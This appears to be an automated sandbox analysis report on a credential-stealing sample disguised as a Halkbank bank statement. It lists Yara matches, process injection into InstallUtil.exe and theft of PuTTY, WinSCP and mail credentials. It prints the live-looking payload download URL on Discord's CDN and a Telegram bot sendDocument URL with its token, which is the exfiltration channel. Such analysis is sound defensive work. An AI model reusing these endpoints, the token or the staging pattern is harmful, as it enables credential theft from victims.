Source: Yara match File source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.33ac7a8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.33ac7a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.Ffnbziuo.exe.335c788.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Halkbank_Ekstre_20220513_082357_541079.exe.41ec7a8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.399275119.000000000415D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.545103234.000000000331D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.527576945.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.386534863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.548623792.0000000008269000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.386867081.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.398967629.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.386199386.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.545199356.00000000033AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.385913370.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.544867705.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.399607436.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.529435822.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Halkbank_Ekstre_20220513_082357_541079.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Ffnbziuo.exe PID: 4600, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626599 Sample: Halkbank_Ekstre_20220513_08... Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 47 api.telegram.org 2->47 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 8 other signatures 2->69 8 Halkbank_Ekstre_20220513_082357_541079.exe 16 7 2->8         started        13 Ffnbziuo.exe 14 3 2->13         started        15 Ffnbziuo.exe 3 2->15         started        signatures3 process4 dnsIp5 49 cdn.discordapp.com 162.159.135.233, 443, 49749 CLOUDFLARENETUS United States 8->49 51 192.168.2.1 unknown unknown 8->51 39 C:\Users\user\AppData\...\Ffnbziuo.exe, PE32 8->39 dropped 41 C:\Users\...\Ffnbziuo.exe:Zone.Identifier, ASCII 8->41 dropped 43 Halkbank_Ekstre_20...2357_541079.exe.log, ASCII 8->43 dropped 71 Writes to foreign memory regions 8->71 73 Injects a PE file into a foreign processes 8->73 17 InstallUtil.exe 14 6 8->17         started        21 cmd.exe 1 8->21         started        53 162.159.133.233, 443, 49779, 49781 CLOUDFLARENETUS United States 13->53 75 Multi AV Scanner detection for dropped file 13->75 77 Machine Learning detection for dropped file 13->77 23 cmd.exe 13->23         started        25 cmd.exe 15->25         started        file6 signatures7 process8 dnsIp9 45 api.telegram.org 149.154.167.220, 443, 49774, 49776 TELEGRAMRU United Kingdom 17->45 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->57 59 Tries to steal Mail credentials (via file / registry access) 17->59 61 3 other signatures 17->61 27 conhost.exe 21->27         started        29 timeout.exe 1 21->29         started        31 conhost.exe 23->31         started        33 timeout.exe 23->33         started        35 conhost.exe 25->35         started        37 timeout.exe 25->37         started        signatures10 process11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
162.159.135.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
162.159.133.233
 unknown United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
cdn.discordapp.com 162.159.135.233 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot5351864471:AAGAqiOJqCiUj9zFIqSZeiHPgOb5cf2UkxY/sendDocument false
    		high
    https://cdn.discordapp.com/attachments/968269163632152578/974666441108365352/Idksgm_Umgkodlw.bmp false
      		high